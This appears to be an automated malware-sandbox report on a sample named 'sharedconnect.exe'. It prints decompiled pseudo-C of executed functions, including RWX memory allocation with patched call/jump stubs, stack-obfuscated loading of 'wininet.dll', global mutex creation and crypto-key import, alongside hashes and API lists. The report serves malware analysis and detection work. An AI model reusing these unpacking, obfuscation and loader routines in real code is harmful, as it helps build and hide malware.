API ID: Virtual$Protect$Alloc
String ID: l
API String ID: 2541858876-2517025534
Opcode ID: 0c9c3fd92af66569a166b198bee1cdbcdc3c4921e6b988be0fd666d4d80ef83b
Instruction ID: 0ba1f0cb1a758cee3c1b93dad5e044f760f1496dc072eb286036782b5d782785
Opcode Fuzzy Hash: 0c9c3fd92af66569a166b198bee1cdbcdc3c4921e6b988be0fd666d4d80ef83b
Instruction Fuzzy Hash: 8F81F5B4E002188FDB14CFA8C980A9DBBF1FF88304F6581A9D919AB356D735AD45CF90

Uniqueness

Uniqueness Score: -1.00%

Function 007723BE, Relevance: 1.4, APIs: 1, Instructions: 200
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 30%

			E007723BE(intOrPtr _a4, void* _a8) {
				char _v21;
				char _v26;
				char _v31;
				intOrPtr* _v36;
				intOrPtr _v40;
				intOrPtr* _v44;
				intOrPtr* _v48;
				void** _v52;
				char* _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr* _v72;
				intOrPtr* _v76;
				intOrPtr* _v80;
				void** _v84;
				char* _v88;
				intOrPtr _v92;
				intOrPtr _v96;
				char* _v100;
				intOrPtr _v104;
				signed int _v108;
				signed int _v112;
				intOrPtr _v116;
				intOrPtr _v120;
				intOrPtr _v124;
				intOrPtr _v128;
				intOrPtr _v132;
				intOrPtr _v136;
				intOrPtr _v140;
				intOrPtr _v144;
				intOrPtr _v148;
				intOrPtr _v152;
				intOrPtr _v156;
				intOrPtr _v160;
				intOrPtr _v164;
				void* _t121;
				intOrPtr _t143;
				intOrPtr _t148;
				intOrPtr _t157;
				intOrPtr _t158;
				void* _t162;
				intOrPtr _t164;
				intOrPtr _t167;
				char* _t168;
				void** _t173;
				void* _t178;
				intOrPtr _t191;
				intOrPtr _t197;
				intOrPtr _t214;
				intOrPtr _t217;
				intOrPtr* _t223;
				void** _t232;
				char* _t234;
				void* _t243;
				intOrPtr* _t244;

				_v36 =  &_v21;
				_v40 = _a4;
				_v44 =  &_v31;
				_v48 =  &_v26;
				_t121 = VirtualAlloc(0, 0x10000, 0x1000, 0x40); // executed
				_t234 =  &_v21;
				_t168 =  &_v26;
				_v52 = _t121;
				_v56 =  &_v31;
				 *_v52 = 0;
				_v60 =  *((intOrPtr*)(_v40 + 0x3c));
				_v64 = 4;
				_v68 = _v40 + _v60;
				_t130 =  ==  ? _v68 : 0;
				_v72 = _v56 + 1;
				_v76 = _t168 + 1;
				_v80 = _t234 + 1;
				_v84 =  &(_v52[1]);
				_v88 = _t168;
				_v92 = _v40 -  *((intOrPtr*)(( ==  ? _v68 : 0) + 0x34));
				_v96 = _v64;
				_v100 = _t234;
				_v104 = 0xfffffffb - _v52;
				_v108 = 0;
				while(1) {
					_t191 = _v96;
					_v112 = _v108;
					_v116 = _t191;
					_t143 = _t191 + _v52;
					 *_v56 = 0xe8;
					 *_v72 = 0x772162 - _t143;
					_t173 = _v52;
					_v120 = _t143;
					 *((intOrPtr*)(_t173 + _v116)) =  *_v44;
					_t197 = _v116;
					 *((char*)(_t173 + _t197 + 4)) =  *((intOrPtr*)(_v44 + 4));
					_t148 =  *((intOrPtr*)(0x77304c + _v112 * 0xc + 4));
					_v124 = _t148;
					_t178 = _t148 + _v40;
					 *_v88 = 0xe9;
					_v128 = _v120 + 0xfffffffb - _t178;
					_v132 = _t197 + 5;
					 *_v76 = _v128;
					 *_v100 = 0xe9;
					 *_v80 = _v104 + 0xfffffffb - _v116 + _t178;
					_v136 =  *((intOrPtr*)(0x77304c + _v112 * 0xc + 8));
					_v140 =  *((intOrPtr*)(0x77304c + _v112 * 0xc));
					_v144 = _v52 + _v132;
					_v148 = 0;
					do {
						_t157 = _v148;
						 *((char*)(_v144 + _t157)) =  *((intOrPtr*)(_v140 + _t157));
						_t158 = _t157 + 1;
						_v148 = _t158;
					} while (_t158 != _v136);
					_t244 = _t243 - 0x14;
					 *_t244 = _v40;
					_v164 = _v92;
					_v160 = _v124;
					_v156 = _v136;
					_v152 = _v144;
					E0077217A();
					_t243 = _t244 + 0x14;
					_t162 = _v116 + _v136;
					_t223 = _v36;
					_t232 = _v84;
					 *((intOrPtr*)(_t232 + _t162)) =  *_t223;
					 *((char*)(_t232 + _t162 + 4)) =  *((intOrPtr*)(_t223 + 4));
					_t164 = _v40;
					_t214 = _v124;
					 *((intOrPtr*)(_t164 + _t214)) =  *_v48;
					 *((char*)(_t164 + _t214 + 4)) =  *((intOrPtr*)(_v48 + 4));
					_t167 = _v116 + 0xe + _v136;
					_t217 = _v112 + 1;
					_v96 = _t167;
					_v108 = _t217;
					if(_t217 != 0x14e) {
						continue;
					}
					return _t167;
				}
			}

0x007723ea
0x007723ed
0x007723f0
0x007723f3
0x007723f6
0x007723ff
0x00772407
0x0077240a
0x00772410
0x00772416
0x00772422
0x00772428
0x00772433
0x00772445
0x00772454
0x0077245c
0x00772469
0x00772472
0x00772478
0x0077247b
0x0077247e
0x00772481
0x00772484
0x00772487
0x00772497
0x0077249a
0x007724b3
0x007724b8
0x007724be
0x007724c3
0x007724cb
0x007724d2
0x007724d5
0x007724db
0x007724e4
0x007724e7
0x007724fb
0x007724ff
0x00772505
0x0077250a
0x00772515
0x0077251b
0x00772521
0x00772535
0x00772547
0x0077255b
0x00772561
0x00772567
0x0077256d
0x00772573
0x00772573
0x00772588
0x0077258b
0x00772596
0x00772596
0x0077259e
0x007725a4
0x007725aa
0x007725b1
0x007725bb
0x007725c5
0x007725c9
0x007725ce
0x007725da
0x007725dc
0x007725e1
0x007725e4
0x007725ea
0x007725f3
0x007725f6
0x007725f9
0x00772602
0x00772612
0x00772617
0x00772620
0x00772623
0x00772626
0x00000000
0x0077262c
0x00772496
0x00772496

APIs

VirtualAlloc.KERNELBASE(00000000,00010000,00001000,00000040), ref: 007723F6

Memory Dump Source

Source File: 00000006.00000002.402827778.0000000000770000.00000040.00000001.sdmp, Offset: 00770000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_770000_sharedconnect.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 8758edee3089db3524d0c0ac002bdb451c1db017f613f54b1ea2a6aeace51a6d
Instruction ID: 77491fba60deaf8512cd04566cf20e937150ddb15e92f8358ec480c91648f108
Opcode Fuzzy Hash: 8758edee3089db3524d0c0ac002bdb451c1db017f613f54b1ea2a6aeace51a6d
Instruction Fuzzy Hash: 9591D075E002198FCB14CFA8D890A9CBBF1BF49314F1581AAE959EB391D730AD46CF54

Uniqueness

Uniqueness Score: -1.00%

Function 003C4285, Relevance: 1.4, APIs: 1, Instructions: 103
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNELBASE ref: 003C4446

Memory Dump Source

Source File: 00000006.00000002.402489648.00000000003C3000.00000020.00020000.sdmp, Offset: 003B0000, based on PE: true

Associated: 00000006.00000002.402392580.00000000003B0000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.402418647.00000000003B1000.00000020.00020000.sdmp Download File
Associated: 00000006.00000002.402437277.00000000003B4000.00000020.00020000.sdmp Download File
Associated: 00000006.00000002.402465144.00000000003BD000.00000020.00020000.sdmp Download File
Associated: 00000006.00000002.402477227.00000000003BF000.00000020.00020000.sdmp Download File
Associated: 00000006.00000002.402507015.00000000003C9000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.402524263.00000000003CA000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.402555487.00000000003CC000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.402567651.00000000003CD000.00000008.00020000.sdmp Download File
Associated: 00000006.00000002.402616947.00000000003E0000.00000008.00020000.sdmp Download File
Associated: 00000006.00000002.402634374.00000000003ED000.00000008.00020000.sdmp Download File
Associated: 00000006.00000002.402646909.00000000003F3000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.402665960.00000000003F9000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3b0000_sharedconnect.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: e922879f8799bae376b821e174a72aa6bce7290e03e31c2b940cf6e3bbb04bab
Instruction ID: 61ed7a6b9f94bf55bf314b8017f01903d0a359368cd0ddc33f9fffe44f55e38b
Opcode Fuzzy Hash: e922879f8799bae376b821e174a72aa6bce7290e03e31c2b940cf6e3bbb04bab
Instruction Fuzzy Hash: BD410675A093808FC365DF29D190B9BFBF1ABC8364F14891EE89987350DB3598498F82

Uniqueness

Uniqueness Score: -1.00%

Function 00771DA8, Relevance: 1.3, APIs: 1, Instructions: 74
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNELBASE ref: 00771DEE

Memory Dump Source

Source File: 00000006.00000002.402827778.0000000000770000.00000040.00000001.sdmp, Offset: 00770000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_770000_sharedconnect.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 2e0ddd0efca3ece41e65d79c72edccad1f6509bc2e64a33ad5723e5ecd95c2e7
Instruction ID: 6a39bfa29a8774020c70b8457ed3416c4a875faf49add120c758684ef18771de
Opcode Fuzzy Hash: 2e0ddd0efca3ece41e65d79c72edccad1f6509bc2e64a33ad5723e5ecd95c2e7
Instruction Fuzzy Hash: 583134B4A04205DFCB48DF68C594A6EBBF1FF88304F60896DD848AB341D779A942CF91

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Analysis Process: sharedconnect.exe PID: 6128 Parent PID: 2932 sharedconnect.exeCOMMON

Execution Graph

Execution Coverage:	16.3%
Dynamic/Decrypted Code Coverage:	97.5%
Signature Coverage:	0%
Total number of Nodes:	441
Total number of Limit Nodes:	19

Executed Functions

Function 003B14C9, Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 259
filewindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 60%

			E003B14C9() {
				void* _v16;
				void* _v36;
				intOrPtr _v40;
				signed int _v44;
				short _v46;
				intOrPtr _v48;
				signed int _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				long _v64;
				signed int _v68;
				signed int _v82;
				signed int _v84;
				signed int _v88;
				void* _v92;
				char* _v96;
				void** _v104;
				intOrPtr _v120;
				intOrPtr _v124;
				char _v332;
				void* _v352;
				intOrPtr _v356;
				struct _ICONINFO _v376;
				char _v610;
				intOrPtr _v616;
				intOrPtr _v652;
				void* _v660;
				char _v664;
				intOrPtr _v668;
				void* _v696;
				char _v700;
				char* _v704;
				intOrPtr* _v708;
				intOrPtr _v712;
				intOrPtr _v716;
				signed int _v720;
				CHAR* _v724;
				DWORD* _v728;
				intOrPtr _v732;
				signed int _v736;
				intOrPtr _v740;
				signed int _v744;
				intOrPtr _v748;
				signed int _v752;
				long _v756;
				intOrPtr _v760;
				int _v764;
				int _v768;
				struct _ICONINFO* _v772;
				struct HICON__* _v776;
				long _v793;
				intOrPtr _v800;
				signed int _v801;
				short _v802;
				intOrPtr _v804;
				void* _v816;
				signed int _v820;
				intOrPtr _v828;
				signed int _v832;
				void* _v836;
				intOrPtr _v840;
				long _v841;
				long _v842;
				intOrPtr _v844;
				int _v852;
				intOrPtr _v872;
				intOrPtr _v884;
				intOrPtr _v888;
				intOrPtr _v892;
				intOrPtr _v900;
				intOrPtr _v904;
				intOrPtr _t144;
				signed int _t145;
				int _t146;
				intOrPtr _t147;
				int _t148;
				struct HICON__* _t150;
				void* _t151;
				struct HICON__* _t156;
				void* _t161;
				intOrPtr _t163;
				intOrPtr _t166;
				intOrPtr _t167;
				intOrPtr _t168;
				void* _t172;
				intOrPtr _t173;
				void* _t176;
				signed int _t177;
				intOrPtr _t183;
				CHAR* _t186;
				long _t188;
				signed int _t189;
				signed int _t190;
				intOrPtr _t192;
				intOrPtr _t202;
				void* _t204;
				void* _t227;
				signed int _t240;
				signed int _t252;
				void* _t255;

				_v36 = 0;
				_v40 = 0x440555f2;
				_v46 = 0xb400;
				_v52 = 0x76126aff;
				_t192 = _v40;
				_t240 = _v44;
				asm("sbb edi, edx");
				_v700 = 0x761272f5;
				_v44 = _t240 + 0x14c58f1d;
				_v60 = 0;
				_v64 = 0x8e773d56 - _t192;
				_v616 = 0x237b1133;
				_v696 = 0;
				_t186 =  &_v332;
				_v704 =  &_v610;
				_v708 = wsprintfA;
				_v712 = _t240;
				_v716 = _t192;
				_v720 = _v36;
				_v724 = _t186;
				_v728 =  &_v696;
				_t144 =  *_v708(_t186, "%S", _v704);
				_t255 = (_t252 & 0xfffffff8) - 0x348 + 0xc;
				_v732 = _t144;
				_t145 = GetBinaryTypeA(_v724, _v728);
				_v52 =  !_v720;
				_v744 = _t145;
				_t146 = ReleaseCapture();
				_v748 = _t146;
				_t147 =  *__imp__GetGUIThreadInfo(0x5fa,  &_v700);
				_v92 = 0;
				_v760 = _t147;
				_t148 = DuplicateHandle(0, 0, 0,  &_v92, _v68 + 0x89ed98db, 0x736, _v68 + 0x89ed98db); // executed
				_v44 = _v736;
				_v48 = _v732;
				_t188 = _v716 - _v68;
				_v764 = _t148;
				_v768 = LockFile(0, _t188, _t188, _v68 ^ 0x76126cc0, 0x1ac);
				_v772 =  &(_v376.xHotspot);
				_t150 = CreateIconIndirect( &(_v376.xHotspot));
				_v660 = 0;
				_v776 = _t150;
				goto L17;
				do {
					while(1) {
						L17:
						_t151 = _v660;
						_v352 = _t151;
						_t202 = _t151 - 1;
						_v836 = _t151;
						_v840 = _t202;
						if(_t202 == 0) {
							goto L21;
						}
						_t183 = _v836 - 5;
						_v844 = _t183;
						if(_t183 == 0) {
							L1:
							_v802 = GlobalDeleteAtom(0x3a);
						} else {
						}
						L16:
						_v832 = _v356 + 1;
						_t156 = CreateIconIndirect( &_v376);
						_t204 = _v836;
						_v668 = _t204;
						_v52 = _v744;
						_v56 = _v740;
						_v68 = _v736 ^ 0x4ebe5432;
						_v840 = _t156;
						if(_t204 > 0x73) {
							_v96 =  &_v664;
							_v68 = _v736 + _v736;
							_t189 = _t188 & 0xffffff00 | __eflags > 0x00000000;
							__eflags = _v84;
							_t75 = _v84 != 0;
							__eflags = _t75;
							_t188 = _t189 & 0xffffff00 | _t75;
							_v793 = _t188;
							_v800 = _v88 - 0x287c73b9;
							_v801 = _t188;
							if(_t75 != 0) {
								_v801 = _v793;
							}
							__eflags = _v801;
							if(__eflags != 0) {
								_t161 = _v88;
								_t255 = _t255 - 0xc;
								_t227 = _t255;
								 *((intOrPtr*)(_t227 + 8)) =  &_v664;
								 *(_t227 + 4) = "Card4G";
								_v816 = _t161;
								_v820 = _v84;
								L003C784C(); // executed
								_t190 = _t188 & 0xffffff00 | __eflags > 0x00000000;
								__eflags = _v832;
								_t97 = _v832 != 0;
								__eflags = _t97;
								_t188 = _t190 & 0xffffff00 | _t97;
								_v836 = _t161;
								_v840 = _v828 - 0x792c87a;
								_v841 = _t188;
								_v842 = _t188;
								if(_t97 != 0) {
									_v842 = _v841;
								}
								__eflags = _v842;
								if(__eflags != 0) {
									_t163 =  *((intOrPtr*)( *[fs:0x18] + 0x30));
									__eflags =  *((intOrPtr*)(_t163 + 0xa4)) - 6;
									if( *((intOrPtr*)(_t163 + 0xa4)) < 6) {
										break;
									} else {
										_v804 = 0;
										_t172 = L003B1050();
										_t173 =  *((intOrPtr*)(_t172 + 0x3c));
										_t188 = _v756;
										_v64 = _t188;
										_v68 = _v752;
										__eflags =  *((intOrPtr*)(_t172 + _t173)) - (_v88 ^ 0x76122faf);
										_t176 =  ==  ? _t172 + _t173 : _v804;
										__eflags =  *((intOrPtr*)(_t176 + 0x48)) - (_v82 ^ 0x0000b405);
										if( *((intOrPtr*)(_t176 + 0x48)) > (_v82 ^ 0x0000b405)) {
											_t177 = L003B109B(); // executed
											_v820 = _t177;
										} else {
											break;
										}
									}
								} else {
									goto L1;
								}
							} else {
								break;
							}
							L24:
							_v904 = _v124;
							return 1;
						} else {
							continue;
						}
						L21:
						_v852 = CancelIo(0);
						goto L16;
					}
					_v104 =  &_v660;
					_v872 = _v652;
					_t166 =  *__imp__AddUsersToEncryptedFile(L"Swb4Ci$@pjWqJ",  &_v660);
					_v884 = _t166;
					_t167 =  *__imp__FlsGetValue(1);
					_v892 = _t167;
					_t168 =  *__imp__FlsFree(0x14a6f8);
					_v696 = 0x2e4de8af;
					__eflags = _v888 - 0x56f45d1e;
					_v900 = _t168;
				} while (__eflags >= 0);
				_v840 = _v120;
				goto L24;
			}

APIs

DuplicateHandle.KERNELBASE(00000000,00000000,00000000,?,?,00000736,?), ref: 003B1654
LockFile.KERNEL32(00000000,?,?,?,000001AC), ref: 003B16A6
CreateIconIndirect.USER32 ref: 003B16C5

Strings

Swb4Ci$@pjWqJ, xrefs: 003B1926

Memory Dump Source

Source File: 00000007.00000002.741396018.00000000003B1000.00000020.00020000.sdmp, Offset: 003B0000, based on PE: true

Associated: 00000007.00000002.741376856.00000000003B0000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.741412231.00000000003B4000.00000020.00020000.sdmp Download File
Associated: 00000007.00000002.741434330.00000000003BD000.00000020.00020000.sdmp Download File
Associated: 00000007.00000002.741445195.00000000003BF000.00000020.00020000.sdmp Download File
Associated: 00000007.00000002.741459553.00000000003C3000.00000020.00020000.sdmp Download File
Associated: 00000007.00000002.741479571.00000000003C9000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.741498309.00000000003CA000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.741514862.00000000003CC000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.741550678.00000000003CD000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.741687270.00000000003E0000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.741797704.00000000003ED000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.741831856.00000000003F3000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.741850316.00000000003F9000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_3b0000_sharedconnect.jbxd

Similarity

API ID: CreateDuplicateFileHandleIconIndirectLock
String ID: Swb4Ci$@pjWqJ
API String ID: 997836486-4206937320
Opcode ID: c42f196758714df6a6d8335355f47472eff83e766ddb36f29b9983e8ff68f4f1
Instruction ID: 3f6a16f0f9272ec27de765e3af809d54d91353e383327e36e7414797e0fa7b63
Opcode Fuzzy Hash: c42f196758714df6a6d8335355f47472eff83e766ddb36f29b9983e8ff68f4f1
Instruction Fuzzy Hash: 7BC1F375A183808FC336CF69C490B9BBBE9BFC8304F54891EE58D97750DA70AA05CB56

Uniqueness

Uniqueness Score: -1.00%

Function 01482195, Relevance: 4.5, APIs: 3, Instructions: 15
encryptionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 16%

			E01482195(void* __eax) {
				int _t4;
				int _t8;
				void* _t10;

				_t4 = CryptImportKey(); // executed
				_t8 = _t4;
				LocalFree( *(_t10 - 4));
				if(_t8 == 0) {
					CryptReleaseContext( *0x148a870, 0);
				}
				return _t8;
			}

0x0148219a
0x014821a3
0x014821a5
0x014821ad
0x014821b7
0x014821b7
0x014821c3

APIs

CryptImportKey.ADVAPI32 ref: 0148219A
LocalFree.KERNEL32(?), ref: 014821A5
CryptReleaseContext.ADVAPI32(00000000), ref: 014821B7

Memory Dump Source

Source File: 00000007.00000002.742507592.0000000001481000.00000020.00000001.sdmp, Offset: 01480000, based on PE: true

Associated: 00000007.00000002.742494527.0000000001480000.00000002.00000001.sdmp Download File
Associated: 00000007.00000002.742536211.0000000001489000.00000002.00000001.sdmp Download File
Associated: 00000007.00000002.742552249.000000000148A000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1480000_sharedconnect.jbxd

Yara matches

Similarity

API ID: Crypt$ContextFreeImportLocalRelease
String ID:
API String ID: 202888279-0
Opcode ID: 7351d94660f6573da7c7875c6eb2cc70f504dd773507985a2ca4ac31e38f42e3
Instruction ID: ea3083e1c3d2cadd319ca30daccfc3ecd0eae7be2713853e62007fddbe6e55dd
Opcode Fuzzy Hash: 7351d94660f6573da7c7875c6eb2cc70f504dd773507985a2ca4ac31e38f42e3
Instruction Fuzzy Hash: D4D09E35A611249BCA326AA5A80D75C7B70EB44655B24015BED49A3238C7B588119790

Uniqueness

Uniqueness Score: -1.00%

Function 01482336, Relevance: 1.5, APIs: 1, Instructions: 29
encryptionCOMMON

Download Yara Rule

C-Code - Quality: 59%

			E01482336(void* __eax, void* __ebx, intOrPtr* __edi, void* __esi) {
				void* _t8;
				intOrPtr _t15;
				intOrPtr* _t21;
				void* _t25;

				_t23 = __esi;
				_t21 = __edi;
				_t15 =  *((intOrPtr*)(__eax + 4));
				_t8 = L014820D0(__eax, _t15,  *((intOrPtr*)(__eax + 8))); // executed
				if(_t8 != 0) {
					_push(_t15);
					L01482120(_t8,  *((intOrPtr*)(_t25 + 8)), __ebx + 0x60);
					_t23 =  !=  ? 1 : __esi;
				}
				 *0x148a648( *((intOrPtr*)(_t25 + 8)));
				if(_t23 == 0) {
					E014818C0( *_t21);
					 *_t21 = 0;
					 *((intOrPtr*)(_t21 + 4)) = 0;
				}
				return _t23;
			}

0x01482336
0x01482336
0x01482339
0x0148233c
0x01482346
0x01482348
0x0148234f
0x0148235e
0x0148235e
0x01482364
0x0148236c
0x01482370
0x01482375
0x0148237b
0x0148237b
0x0148238a

APIs

CryptDestroyHash.ADVAPI32(?,?,?,?), ref: 01482364

Memory Dump Source

Source File: 00000007.00000002.742507592.0000000001481000.00000020.00000001.sdmp, Offset: 01480000, based on PE: true

Associated: 00000007.00000002.742494527.0000000001480000.00000002.00000001.sdmp Download File
Associated: 00000007.00000002.742536211.0000000001489000.00000002.00000001.sdmp Download File
Associated: 00000007.00000002.742552249.000000000148A000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1480000_sharedconnect.jbxd

Yara matches

Similarity

API ID: CryptDestroyHash
String ID:
API String ID: 174375392-0
Opcode ID: 2f35fb1cfaabac51e403d7eec83d5867ccdfaedefd7324489711e7121cffbcb9
Instruction ID: 20ca62dd478504963bec7db8d52be64e6f50a1ef02225f678a145fb90533bbc0
Opcode Fuzzy Hash: 2f35fb1cfaabac51e403d7eec83d5867ccdfaedefd7324489711e7121cffbcb9
Instruction Fuzzy Hash: BBF08CB16001028BEB11AF15E854B5EB792EFA4354F10422ADC098B375EBB1DD54C7C0

Uniqueness

Uniqueness Score: -1.00%

Function 01486F89, Relevance: 12.3, APIs: 1, Strings: 6, Instructions: 34
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E01486F89(WCHAR* __eax) {
				struct HINSTANCE__* _t24;
				void* _t26;
				void* _t29;
				void* _t30;

				 *((intOrPtr*)(_t30 - 0x18)) = 0x690077;
				 *((intOrPtr*)(_t30 - 0x14)) = 0x69006e;
				 *((intOrPtr*)(_t30 - 0x10)) = 0x65006e;
				 *((intOrPtr*)(_t30 - 0xc)) = 0x2e0074;
				 *((intOrPtr*)(_t30 - 8)) = 0x6c0064;
				 *((intOrPtr*)(_t30 - 4)) = 0x6c;
				 *((intOrPtr*)(_t30 - 0x54)) = 0x7e9cef33;
				 *((intOrPtr*)(_t30 - 0x50)) = 0xdf5dcd1c;
				 *((intOrPtr*)(_t30 - 0x4c)) = 0xf76ea847;
				 *((intOrPtr*)(_t30 - 0x48)) = 0x210615a6;
				 *((intOrPtr*)(_t30 - 0x44)) = 0xf85bec06;
				 *((intOrPtr*)(_t30 - 0x40)) = 0x210615cc;
				 *((intOrPtr*)(_t30 - 0x3c)) = 0xb415740e;
				 *((intOrPtr*)(_t30 - 0x38)) = 0xf14719d1;
				 *((intOrPtr*)(_t30 - 0x34)) = 0xc68243e2;
				 *((intOrPtr*)(_t30 - 0x30)) = 0x2e7786e5;
				 *((intOrPtr*)(_t30 - 0x2c)) = 0x17af1f7c;
				 *((intOrPtr*)(_t30 - 0x28)) = 0x704a2194;
				 *((intOrPtr*)(_t30 - 0x24)) = 0xa5de13b2;
				 *((intOrPtr*)(_t30 - 0x20)) = 0x5f2aa102;
				 *((intOrPtr*)(_t30 - 0x1c)) = 0xcebb686;
				_t24 = LoadLibraryW(__eax); // executed
				 *0x148a864 = _t24;
				return E01481620(_t26, _t24, _t30 - 0x54, _t29, 0xf, 0x7b12011d, 0x148a7e0);
			}

0x01486f89
0x01486f91
0x01486f98
0x01486f9f
0x01486fa6
0x01486fad
0x01486fb4
0x01486fbb
0x01486fc2
0x01486fc9
0x01486fd0
0x01486fd7
0x01486fde
0x01486fe5
0x01486fec
0x01486ff3
0x01486ffa
0x01487001
0x01487008
0x0148700f
0x01487016
0x0148701d
0x01487032
0x01487044

APIs

LoadLibraryW.KERNELBASE ref: 0148701D

Strings

n, xrefs: 01486F98
n, xrefs: 01486F91
t, xrefs: 01486F9F
l, xrefs: 01486FAD
w, xrefs: 01486F89
d, xrefs: 01486FA6

Memory Dump Source

Source File: 00000007.00000002.742507592.0000000001481000.00000020.00000001.sdmp, Offset: 01480000, based on PE: true

Associated: 00000007.00000002.742494527.0000000001480000.00000002.00000001.sdmp Download File
Associated: 00000007.00000002.742536211.0000000001489000.00000002.00000001.sdmp Download File
Associated: 00000007.00000002.742552249.000000000148A000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1480000_sharedconnect.jbxd

Yara matches

Similarity

API ID: LibraryLoad
String ID: d$l$n$n$t$w
API String ID: 1029625771-683715976
Opcode ID: d0d8b961b17787d73ba45d86e8db58866c326d17dd516ec3e36d92fba2940562
Instruction ID: 98aa5709b5bb167b5103e72f0d7223bcb4d8d67d5bd16d5c0ab482ee3af3a2e3
Opcode Fuzzy Hash: d0d8b961b17787d73ba45d86e8db58866c326d17dd516ec3e36d92fba2940562
Instruction Fuzzy Hash: 8111CEB0D02359EBDF20DF91D9896DCBFB1BB44704F248209E5947A218D3B54A86CF64

Uniqueness

Uniqueness Score: -1.00%

Function 0148716A, Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 28
synchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 37%

			E0148716A(void* __eax) {
				void* _t19;
				void* _t23;

				 *((intOrPtr*)(_t23 - 0x18)) = 0x6c0047;
				 *((short*)(_t23 - 4)) = 0;
				 *((intOrPtr*)(_t23 - 0x14)) = 0x62006f;
				 *((intOrPtr*)(_t23 - 0x10)) = 0x6c0061;
				 *((intOrPtr*)(_t23 - 0xc)) = 0x49005c;
				 *((intOrPtr*)(_t23 - 8)) = 0x580025;
				 *0x148a7cc(_t23 - 0x98, 0x40, _t23 - 0x18);
				_t19 = CreateMutexW(0, 0, _t23 - 0x98); // executed
				 *0x148a834 = _t19;
				return 0 | _t19 != 0x00000000;
			}

0x01487171
0x01487178
0x01487186
0x01487190
0x01487197
0x0148719e
0x014871a5
0x014871b9
0x014871c1
0x014871d0

APIs

_snwprintf.NTDLL ref: 014871A5
CreateMutexW.KERNELBASE(00000000,00000000,?), ref: 014871B9

Strings

\, xrefs: 01487197
a, xrefs: 01487190
G, xrefs: 01487171
%, xrefs: 0148719E
o, xrefs: 01487186

Memory Dump Source

Source File: 00000007.00000002.742507592.0000000001481000.00000020.00000001.sdmp, Offset: 01480000, based on PE: true

Associated: 00000007.00000002.742494527.0000000001480000.00000002.00000001.sdmp Download File
Associated: 00000007.00000002.742536211.0000000001489000.00000002.00000001.sdmp Download File
Associated: 00000007.00000002.742552249.000000000148A000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1480000_sharedconnect.jbxd

Yara matches

Similarity

API ID: CreateMutex_snwprintf
String ID: %$G$\$a$o
API String ID: 451050361-4186019298
Opcode ID: 797903c21002cbc0af9be9fc52baea183336acfcdd2612ccb849ad930584274b
Instruction ID: 708fa855831613d61ac787b86c449cdf36180db6aba4c805e13809fc4aace9dd
Opcode Fuzzy Hash: 797903c21002cbc0af9be9fc52baea183336acfcdd2612ccb849ad930584274b
Instruction Fuzzy Hash: 7FF05EB0A11209DBDB50DFA49845BEE7BF8EF04705F10409EAA0CE7241D7B186888F98

Uniqueness

Uniqueness Score: -1.00%

Function 014871EA, Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 28
synchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 37%

			E014871EA(void* __eax) {
				void* _t19;
				void* _t23;

				 *((intOrPtr*)(_t23 - 0x18)) = 0x6c0047;
				 *((short*)(_t23 - 4)) = 0;
				 *((intOrPtr*)(_t23 - 0x14)) = 0x62006f;
				 *((intOrPtr*)(_t23 - 0x10)) = 0x6c0061;
				 *((intOrPtr*)(_t23 - 0xc)) = 0x4d005c;
				 *((intOrPtr*)(_t23 - 8)) = 0x580025;
				 *0x148a7cc(_t23 - 0x98, 0x40, _t23 - 0x18);
				_t19 = CreateMutexW(0, 0, _t23 - 0x98); // executed
				 *0x148a828 = _t19;
				return 0 | _t19 != 0x00000000;
			}

0x014871f1
0x014871f8
0x01487206
0x01487210
0x01487217
0x0148721e
0x01487225
0x01487239
0x01487241
0x01487250

APIs

_snwprintf.NTDLL ref: 01487225
CreateMutexW.KERNELBASE(00000000,00000000,?), ref: 01487239

Strings

a, xrefs: 01487210
G, xrefs: 014871F1
o, xrefs: 01487206
\, xrefs: 01487217
%, xrefs: 0148721E

Memory Dump Source

